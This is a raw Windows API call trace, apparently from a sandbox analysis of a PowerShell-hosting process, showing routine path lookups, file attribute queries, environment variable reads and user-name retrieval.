	[0146.363] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.365] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.365] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.366] SetErrorMode (uMode=0x1) returned 0x1
	[0146.366] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cff0 | out: lpFileInformation=0x14cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0146.366] SetErrorMode (uMode=0x1) returned 0x1
	[0146.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.366] SetErrorMode (uMode=0x1) returned 0x1
	[0146.366] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cff0 | out: lpFileInformation=0x14cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0146.366] SetErrorMode (uMode=0x1) returned 0x1
	[0146.367] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.367] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.370] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.370] SetErrorMode (uMode=0x1) returned 0x1
	[0146.370] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cfb0 | out: lpFileInformation=0x14cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0146.370] SetErrorMode (uMode=0x1) returned 0x1
	[0146.370] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.370] SetErrorMode (uMode=0x1) returned 0x1
	[0146.370] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cfb0 | out: lpFileInformation=0x14cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0146.371] SetErrorMode (uMode=0x1) returned 0x1
	[0146.371] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.371] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.371] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.371] SetErrorMode (uMode=0x1) returned 0x1
	[0146.371] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cfb0 | out: lpFileInformation=0x14cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0146.371] SetErrorMode (uMode=0x1) returned 0x1
	[0146.371] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.371] SetErrorMode (uMode=0x1) returned 0x1
	[0146.371] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cfb0 | out: lpFileInformation=0x14cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0146.371] SetErrorMode (uMode=0x1) returned 0x1
	[0146.371] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.372] SetErrorMode (uMode=0x1) returned 0x1
	[0146.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cfb0 | out: lpFileInformation=0x14cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0146.372] SetErrorMode (uMode=0x1) returned 0x1
	[0146.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.372] SetErrorMode (uMode=0x1) returned 0x1
	[0146.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cfb0 | out: lpFileInformation=0x14cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0146.372] SetErrorMode (uMode=0x1) returned 0x1
	[0146.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.373] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.373] SetErrorMode (uMode=0x1) returned 0x1
	[0146.373] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cff0 | out: lpFileInformation=0x14cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0146.373] SetErrorMode (uMode=0x1) returned 0x1
	[0146.373] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.373] SetErrorMode (uMode=0x1) returned 0x1
	[0146.373] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cff0 | out: lpFileInformation=0x14cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0146.373] SetErrorMode (uMode=0x1) returned 0x1
	[0146.374] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0146.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.374] SetErrorMode (uMode=0x1) returned 0x1
	[0146.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cff0 | out: lpFileInformation=0x14cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0146.374] SetErrorMode (uMode=0x1) returned 0x1
	[0146.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.374] SetErrorMode (uMode=0x1) returned 0x1
	[0146.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cff0 | out: lpFileInformation=0x14cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0146.375] SetErrorMode (uMode=0x1) returned 0x1
	[0146.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0146.581] SetErrorMode (uMode=0x1) returned 0x1
	[0146.582] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d2b0 | out: lpFileInformation=0x14d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0146.582] SetErrorMode (uMode=0x1) returned 0x1
	[0146.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.771] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0146.771] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d618 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d618) returned 0x1
	[0146.772] CoTaskMemFree (pv=0x1b7e6220) 
	[0146.772] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0146.772] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d658 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d658) returned 1
	[0146.772] CoTaskMemFree (pv=0x19eeb0) 
	[0146.774] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f50e20*="Available", lpRawData=0x2f50bb0) returned 1
	[0146.877] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.877] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.879] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.879] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.882] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.882] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0146.882] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.882] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.882] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0146.882] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.884] GetCurrentProcessId () returned 0xaa0
	[0146.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
